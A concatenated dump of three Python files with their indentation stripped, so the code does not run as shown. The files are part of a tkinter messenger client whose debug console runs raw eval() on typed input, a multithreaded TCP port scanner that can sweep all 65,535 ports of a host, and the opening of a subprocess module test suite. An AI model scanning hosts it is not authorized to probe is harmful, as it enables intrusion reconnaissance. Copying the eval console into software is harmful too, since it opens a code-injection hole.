ekey_btn_set = tk.Button(frame_encKeySettings, text='Set', command=_set_enc_key, relief=tk.FLAT, bg='#dfdfdf')
frame_encKeySettings.grid(row=1, column=0, sticky='NSEW')
ekey_warning_label.grid(row=0, column=0, sticky='W')
ekey_currentKey_label.grid(row=1, column=0, sticky='EW')
ekey_btn_showCurrentKey.grid(row=1, column=1, sticky='EW')
ekey_input_field.grid(row=2, column=0, sticky='E')
ekey_btn_set.grid(row=2, column=1, sticky='EW')
# Refresh theme
# self.refresh_color_scheme(1) # TODO: Finish screen
def show_debug_console(self):
"""
Show the in-app console with action logs.
"""
if hasattr(self, 'debug_console_showing'): return False
def _handleConsoleInput(e):
input_str: str = self.__debug_console_input.get()
if input_str == 'clear':
self.__debug_console_output.config(state=tk.NORMAL)
self.__debug_console_output.delete(1.0, tk.END)
self.__debug_console_output.config(state=tk.DISABLED)
elif input_str == 'clear-chat':
self.chat_messages.config(state=tk.NORMAL)
self.chat_messages.delete(1.0, tk.END)
self.chat_messages.config(state=tk.DISABLED)
elif input_str == 'refresh-theme': self.refresh_color_scheme()
elif input_str == 'polling-stop': self.messenger.stop_message_polling()
elif input_str == 'test-raise': raise Exception('Test exception raised')
elif input_str == 'version': h.create_log(f'Version: {h.VERSION}')
elif input_str == 'updates-check': self.update_checker.check()
elif input_str.startswith('eval'): eval(input_str[5:])
else: h.create_log('No such command')
self.__debug_console_input.delete(0, tk.END)
def _on_close(window, obj):
delattr(obj, 'debug_console_showing')
obj.HM_Advanced.entryconfig(0, state=tk.NORMAL)
std_redirect.disable()
window.destroy()
ui_window = tk.Toplevel(bg='#181818')
ui_window.geometry('700x300')
ui_window.title('Debug Console')
ui_window.protocol('WM_DELETE_WINDOW', lambda: _on_close(ui_window, self))
ui_window.columnconfigure(0, weight=1)
ui_window.rowconfigure(0, weight=1)
# Top
self.__debug_console_FTop = tk.Frame(ui_window)
self.__debug_console_FTop.columnconfigure(0, weight=1)
self.__debug_console_FTop.rowconfigure(0, weight=1)
self.__debug_console_output = tk.Text(self.__debug_console_FTop, bg='#262626', fg='white', font=h.VMConfig.get(1)['ui']['debug_console']['font'], state=tk.DISABLED)
self.__debug_console_scrollbar = tk.Scrollbar(self.__debug_console_FTop, command=self.__debug_console_output.yview)
self.__debug_console_output.config(yscrollcommand=self.__debug_console_scrollbar.set)
self.__debug_console_FTop.grid(column=0, row=0, sticky="NSEW")
self.__debug_console_output.grid(column=0, row=0, sticky="NSEW")
self.__debug_console_scrollbar.grid(column=1, row=0, sticky="NS")
# Bottom
self.__debug_console_FBot = tk.Frame(ui_window)
self.__debug_console_FBot.columnconfigure(0, weight=1)
self.__debug_console_FBot.rowconfigure(0, weight=1)
self.__debug_console_input = tk.Entry(self.__debug_console_FBot, bg='#303030', fg='#00fa00', font='Consolas 10')
self.__debug_console_input.bind('<Return>', _handleConsoleInput)
self.__debug_console_FBot.grid(column=0, row=1, sticky="NSEW")
self.__debug_console_input.grid(column=0, row=0, sticky="EW")
self.HM_Advanced.entryconfig(0, state=tk.DISABLED)
self.debug_console_showing = True
# Redirect STD (-OUT && -ERROR) to debug console
std_redirect = h_cl.RedirectSTD(self.__debug_console_output)
def startup():
ui_root = tk.Tk()
ui_root.title(h.APPDICT['client']['title'])
h_cl.iconbitmap_universal(ui_root)
ui_root.minsize(width=100, height=100)
mainWindow = VM_MainWindow(ui_root)
h.VMConfig.init(1)
mainWindow.refresh_color_scheme()
mainWindow.init_messenger()
ui_root.mainloop()
def run_source():
""" Startup from source code with poetry """
os.chdir(os.path.dirname(__file__))
startup()
if __name__ == '__main__':
""" Built app startup """
os.chdir(os.path.abspath('.'))
startup()
|
portscanner.py
|
import threading
import socket
import time
import sys
class PortScanner:
def __init__(self,host):
self.host = host
# instance attribute so results are not shared between scanner instances
self.__returned_values = []
def scan(self,port_number):
temp_buffer = []
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(0.5)
port_status = s.connect_ex((self.host,port_number))
except ConnectionRefusedError:
print("No connection could be made because the target machine actively refused it.")
else:
if port_status == 0:
self.__returned_values.append(port_number)
s.close()
return self.__returned_values
def scan_port(self,port_number):
temp_buffer = []
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(0.5)
port_status = s.connect_ex((self.host,port_number))
except ConnectionRefusedError:
print("No connection could be made because the target machine actively refused it.")
else:
if port_status == 0:
self.__returned_values.append(port_number)
s.close()
temp_buffer = self.__returned_values
self.__returned_values = []
return temp_buffer
def scan_range(self,first,last):
threads = []
for i in range(first,last):
t = threading.Thread(target=self.scan,kwargs={'port_number':i})
t.start()
threads.append(t)
# wait for all scan threads to finish before collecting results
for t in threads:
t.join()
temp_buffer = self.__returned_values
self.__returned_values = []
return temp_buffer
#it takes approximately 10 seconds
def scan_all(self):
threads = []
for i in range(1,65536):
t = threading.Thread(target=self.scan,kwargs={'port_number':i})
t.start()
threads.append(t)
# wait for all scan threads to finish before collecting results
for t in threads:
t.join()
temp_buffer = self.__returned_values
self.__returned_values = []
return temp_buffer
#just for console usage
def scan_all_for_console(self):
threads = []
for i in range(1,65536):
t = threading.Thread(target=self.scan,kwargs={'port_number':i})
t.start()
threads.append(t)
sys.stdout.write("\r(%d/65535) ports scanned" % i)
sys.stdout.flush()
print("\n")
# wait for all scan threads to finish before collecting results
for t in threads:
t.join()
temp_buffer = self.__returned_values
self.__returned_values = []
return temp_buffer
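# --- Illustrative usage sketch, not part of the original module ---
# Host and port range below are placeholders.
if __name__ == '__main__':
    scanner = PortScanner('127.0.0.1')
    open_ports = scanner.scan_range(20, 1025)
    print("Open ports:", open_ports)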
|
test_subprocess.py
|
import unittest
from test import script_helper
from test import support
import subprocess
import sys
import signal
import io
import locale
import os
import errno
import tempfile
import time
import re
import selectors
import sysconfig
import warnings
import select
import shutil
import gc
import textwrap
try:
import threading
except ImportError:
threading = None
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
try:
mkstemp = tempfile.mkstemp
except AttributeError:
# tempfile.mkstemp is not available
def mkstemp():
"""Replacement for mkstemp, calling mktemp."""
fname = tempfile.mktemp()
return os.open(fname, os.O_RDWR|os.O_CREAT), fname
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(subprocess._active, "subprocess._active not empty")
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = support.strip_python_stderr(stderr)
# strip_python_stderr also strips whitespace, so we do too.
expected = expected.strip()
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_output() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(FileNotFoundError, self._assert_python, pre_args,
executable="doesnotexist")
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
original_cwd = os.getcwd()
os.chdir(cwd)
cwd = os.getcwd()
os.chdir(original_cwd)
return cwd
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"sys.stdout.write(os.getcwd()); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with script_helper.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
self.addCleanup(p.stderr.close)
self.assertStderrEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"strawberry")
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.addCleanup(p.stdout.close)
self.assertStderrEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') is not None,
'the python library cannot be loaded '
'with an empty environment')
def test_empty_env(self):
with subprocess.Popen([sys.executable, "-c",
'import os; '
'print(list(os.environ.keys()))'],
stdout=subprocess.PIPE,
env={}) as p:
stdout, stderr = p.communicate()
self.assertIn(stdout.strip(),
(b"[]",
# Mac OS X adds __CF_USER_TEXT_ENCODING variable to an empty
# environment
b"['__CF_USER_TEXT_ENCODING']"))
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen((sys.executable, "-c", "pass"), **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertStderrEqual(stderr, b"")
def test_universal_newlines(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
